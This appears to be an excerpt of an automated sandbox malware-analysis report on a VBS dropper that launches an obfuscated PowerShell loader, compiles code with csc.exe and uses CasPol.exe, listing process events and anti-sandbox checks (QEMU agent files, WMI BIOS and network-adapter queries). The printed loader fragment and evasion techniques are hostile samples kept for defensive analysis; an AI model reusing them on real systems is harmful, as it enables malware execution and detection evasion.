            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07B45708 push C34C07A2h; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07B45640 push C34C07A2h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_010E3CD8 push cs; retf 5356h
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_0111B492 push 84DC2881h; retf
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Tries to detect Any.run
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: powershell.exe, 00000006.00000002.86781234856.000000000734F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE,
            Potential evasive VBS script found (use of timer() function in loop)
            Source: Initial fileInitial file: do while timer-temp<sec
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
